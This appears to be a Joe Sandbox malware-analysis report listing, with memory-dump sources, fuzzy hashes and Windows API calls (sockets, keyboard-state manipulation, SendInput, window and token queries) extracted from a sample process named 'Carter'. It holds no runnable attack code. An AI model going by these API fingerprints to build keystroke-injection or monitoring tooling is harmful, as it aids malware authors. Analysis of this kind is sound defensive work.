• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: b8cfc5f07ded58c50d28ad8c4080edd385a754544ae4a4d468c422fcdf5a35c6
• Instruction ID: 01855b5ff54a3e0938cbfa016c896ded6de83069f554706676529227e759679c
• Opcode Fuzzy Hash: b8cfc5f07ded58c50d28ad8c4080edd385a754544ae4a4d468c422fcdf5a35c6
• Instruction Fuzzy Hash: 8841AD74A1120DABDF11EF54C846FEEBBB9EF48754F040129F905A32C1DB709A65CBA2
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 002E70BC
• WSAGetLastError.WSOCK32(00000000), ref: 002E70CC
  • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
  • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002E7130
• WSAGetLastError.WSOCK32(00000000), ref: 002E713C
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 2025e70247e96535b4dc8c44af228c882163f530a8be80e0bae0500dc7797455
• Instruction ID: 13a0c2f79797d253359e38555351dbba20112498be201c97a1c7cdff4ab58f70
• Opcode Fuzzy Hash: 2025e70247e96535b4dc8c44af228c882163f530a8be80e0bae0500dc7797455
• Instruction Fuzzy Hash: C1419171660200AFEB25BF24DC86F2A77A89B04B14F44C458FA5D9F3C2DBB49D218F91
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00300980), ref: 002E6B92
• _strlen.LIBCMT ref: 002E6BC4
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 53a61d89fc29eb6682a27566f601ca76f81f0d93837c46ae6c9d61e504f05b9b
• Instruction ID: 12994421629e017b273594239717836e243924e6b0c1ff76a41e0a40ed355cad
• Opcode Fuzzy Hash: 53a61d89fc29eb6682a27566f601ca76f81f0d93837c46ae6c9d61e504f05b9b
• Instruction Fuzzy Hash: 4F41D231660105ABCB04FB65DC99FAEB3A9EF68350F54815AF81A97292DB30AD21CF50
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002F8F03
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: c53ee203c901e55567b215927b54a639edcf92b59f782134a16ecb66dfff17e0
• Instruction ID: e0d5357c8a8459f3a09fd3459583bda2ff6393323807952122a05f0ca211c740
• Opcode Fuzzy Hash: c53ee203c901e55567b215927b54a639edcf92b59f782134a16ecb66dfff17e0
• Instruction Fuzzy Hash: 2031D33063510EAEEB358E14CC89FB8F7A6EB053A0F944621FB01D65A0CF71D9608A51
APIs
• ClientToScreen.USER32(?,?), ref: 002FB1D2
• GetWindowRect.USER32(?,?), ref: 002FB248
• PtInRect.USER32(?,?,002FC6BC), ref: 002FB258
• MessageBeep.USER32(00000000), ref: 002FB2C9
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 469ee9d3e032bde89ce83e28060942dcce0c669270637bb5f843d8f7080542b4
• Instruction ID: 2fb206fe5174f05800aed2df6a8ffb3b6c7a054824a760e35bd76ea14cd7c9fb
• Opcode Fuzzy Hash: 469ee9d3e032bde89ce83e28060942dcce0c669270637bb5f843d8f7080542b4
• Instruction Fuzzy Hash: 3A418B70A1410D9FDB22CF98C894BADBBF9FB49391F1481B9EA189B251D730A851CF50
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002D1326
• SetKeyboardState.USER32(00000080,?,00000001), ref: 002D1342
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002D13A8
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002D13FA
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 1af75c392aa3c0797ec5b581eb26bcca2d3c44f7fee881b7e08beb40b5ed7d48
• Instruction ID: 1cd587e2a05fcf5a76288210dd85ab693ceadc8e423cb21811545617dbabb9e7
• Opcode Fuzzy Hash: 1af75c392aa3c0797ec5b581eb26bcca2d3c44f7fee881b7e08beb40b5ed7d48
                                                                            • Instruction Fuzzy Hash: 8F315770E64209BEFB358E658C05BFEBBA9AB45320F04428BE48052FD4C3748D719B51
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 002D1465
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 002D1481
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 002D14E0
                                                                            • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 002D1532
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 2c66786c32101766fcca002a2391167460c2ee43a048990b35c7c68ad80d8a17
                                                                            • Instruction ID: 5ab7e19dd33341f15a3f464acdf51f7d643caa1fd873f82ce353de68b0e0a79c
                                                                            • Opcode Fuzzy Hash: 2c66786c32101766fcca002a2391167460c2ee43a048990b35c7c68ad80d8a17
                                                                            • Instruction Fuzzy Hash: 65316C30E6020A7EFF358E659C14BFABBA9AB85310F48431BE49152BD1C3788D719B61
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002A642B
                                                                            • __isleadbyte_l.LIBCMT ref: 002A6459
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002A6487
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002A64BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 6d6d4d203025b0dae36ea6ae4938aafb034712038b08aaee125f4f6d356bc92c
                                                                            • Instruction ID: f0c8b8581e424021d8319570feaa535fa30b6b248baae6c70e8f566c8f668ede
                                                                            • Opcode Fuzzy Hash: 6d6d4d203025b0dae36ea6ae4938aafb034712038b08aaee125f4f6d356bc92c
                                                                            • Instruction Fuzzy Hash: E631C431624256AFDF358F75CC48BAA7BA9FF46310F194029F86497191DF31E860DB50
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 002F553F
                                                                              • Part of subcall function 002D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002D3B4E
                                                                              • Part of subcall function 002D3B34: GetCurrentThreadId.KERNEL32 ref: 002D3B55
                                                                              • Part of subcall function 002D3B34: AttachThreadInput.USER32(00000000,?,002D55C0), ref: 002D3B5C
                                                                            • GetCaretPos.USER32(?), ref: 002F5550
                                                                            • ClientToScreen.USER32(00000000,?), ref: 002F558B
                                                                            • GetForegroundWindow.USER32 ref: 002F5591
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 3de312b650d2a4144fdd0d6e7517c70fae4a380dcc46bb27a0e78dbd5c98292c
                                                                            • Instruction ID: e66cbbb613453d4ff38096a5017279b638cd244ca35ce9a2718d1fd5bce7a13c
                                                                            • Opcode Fuzzy Hash: 3de312b650d2a4144fdd0d6e7517c70fae4a380dcc46bb27a0e78dbd5c98292c
                                                                            • Instruction Fuzzy Hash: 2D312A71911108AFDB14EFA5C885AEEB7FDEF98304F10806AE555E7241EB75AE108FA0
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetCursorPos.USER32(?), ref: 002FCB7A
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002ABCEC,?,?,?,?,?), ref: 002FCB8F
                                                                            • GetCursorPos.USER32(?), ref: 002FCBDC
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002ABCEC,?,?,?), ref: 002FCC16
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: 5a40ce1b77c4e39d5fa30282cf96de4fc80fb76e65ad884d0194f27d7ce61b50
                                                                            • Instruction ID: 3e33c95505370fe14ae178d3e93a7d53c5d4223236e543b7d07f2bc710eab499
                                                                            • Opcode Fuzzy Hash: 5a40ce1b77c4e39d5fa30282cf96de4fc80fb76e65ad884d0194f27d7ce61b50
                                                                            • Instruction Fuzzy Hash: 8631813951001CAFCB268F95CC99EBEBBB9EB49350F144069FA059B261C7315D61DF60
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 00290BE2
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002D7E51,?,?,00000000), ref: 00284041
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002D7E51,?,?,00000000,?,?), ref: 00284065
                                                                            • _fprintf.LIBCMT ref: 00290C19
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 002C694C
                                                                              • Part of subcall function 00294CCA: _flsall.LIBCMT ref: 00294CE3
                                                                            • __setmode.LIBCMT ref: 00290C4E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: d5557dfd3ec412701a8ce2cb31020a64fff8c1341d27b5b2295aa3978f0b8eba
                                                                            • Instruction ID: 4d4867f2472741cbd5888a40d9cd4f5c9e2ba4294ef18e2b49b11583f2319aeb
                                                                            • Opcode Fuzzy Hash: d5557dfd3ec412701a8ce2cb31020a64fff8c1341d27b5b2295aa3978f0b8eba
                                                                            • Instruction Fuzzy Hash: 35112731925108AEDF18B7A4AC46EBE776D9F45321F10011AF104562C2DF715D734BA1
                                                                            APIs
                                                                              • Part of subcall function 002C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C8D3F
                                                                              • Part of subcall function 002C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D49
                                                                              • Part of subcall function 002C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D58
                                                                              • Part of subcall function 002C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D5F
                                                                              • Part of subcall function 002C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D75
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002C92C1
                                                                            • _memcmp.LIBCMT ref: 002C92E4
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C931A
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C9321
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: 1f49b16c9f085ed5a953fcf05b45bb4292f1669b4928d067bf8b90d5a8dabdce
                                                                            • Instruction ID: 1dcaf42912e4be935d2330465c11ddd91b5edd2abf0a9393080469476f5649bf
                                                                            • Opcode Fuzzy Hash: 1f49b16c9f085ed5a953fcf05b45bb4292f1669b4928d067bf8b90d5a8dabdce
                                                                            • Instruction Fuzzy Hash: FE21AC32E51109AFDB14CFA4C948FEEB7B8EF44301F04419DE885AB290D770AA54CF90
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002F63BD
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F63D7
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F63E5
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002F63F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: c43874a67c1f07970f9b0b3fe9d454832398ce287e9267986a41fd1de3262e08
                                                                            • Instruction ID: e8d79bf4c745b6fb77dd94f67f9ceeebd34d51ce929049aa585d990646201570
                                                                            • Opcode Fuzzy Hash: c43874a67c1f07970f9b0b3fe9d454832398ce287e9267986a41fd1de3262e08
                                                                            • Instruction Fuzzy Hash: 6F110331325518AFD705AB28CC58FBAB7A9EF45720F148169F91AC72D2CBB0AD10CF90
                                                                            APIs
                                                                              • Part of subcall function 002CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?), ref: 002CF867
                                                                              • Part of subcall function 002CF858: lstrcpyW.KERNEL32(00000000,?,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CF88D
                                                                              • Part of subcall function 002CF858: lstrcmpiW.KERNEL32(00000000,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?), ref: 002CF8BE
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE488
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE4AE
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE4E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 7560df25fc0465b4ae864ce86978f9875e022e86fc385eac2342a5bd828989ea
                                                                            • Instruction ID: 70cf8cf3b94b9c7321b629b53723e93df2b79fc8b3a9d27bf23a254249d16f7c
                                                                            • Opcode Fuzzy Hash: 7560df25fc0465b4ae864ce86978f9875e022e86fc385eac2342a5bd828989ea
                                                                            • Instruction Fuzzy Hash: CB11513A110345AFDF299F24D845E7A77A9FF45350B81412EF806CB2A0EB719961CB91
                                                                            APIs
                                                                            • _free.LIBCMT ref: 002A5331
                                                                              • Part of subcall function 0029593C: __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029593C: __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029593C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002D4385
                                                                            • _memset.LIBCMT ref: 002D43A6
                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002D43F8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002D4401
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                            • String ID:
                                                                            • API String ID: 1157408455-0
                                                                            APIs
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002D7E51,?,?,00000000), ref: 00284041
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002D7E51,?,?,00000000,?,?), ref: 00284065
                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 002E6A84
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6A8F
                                                                            • _memmove.LIBCMT ref: 002E6ABC
                                                                            • inet_ntoa.WSOCK32(?), ref: 002E6AC7
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 1504782959-0
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 002716B4
                                                                            • GetClientRect.USER32(?,?), ref: 002AB93C
                                                                            • GetCursorPos.USER32(?), ref: 002AB946
                                                                            • ScreenToClient.USER32(?,?), ref: 002AB951
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002C9719
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C972B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C9741
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C975C
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                            • GetStockObject.GDI32(00000011), ref: 00272163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D195E
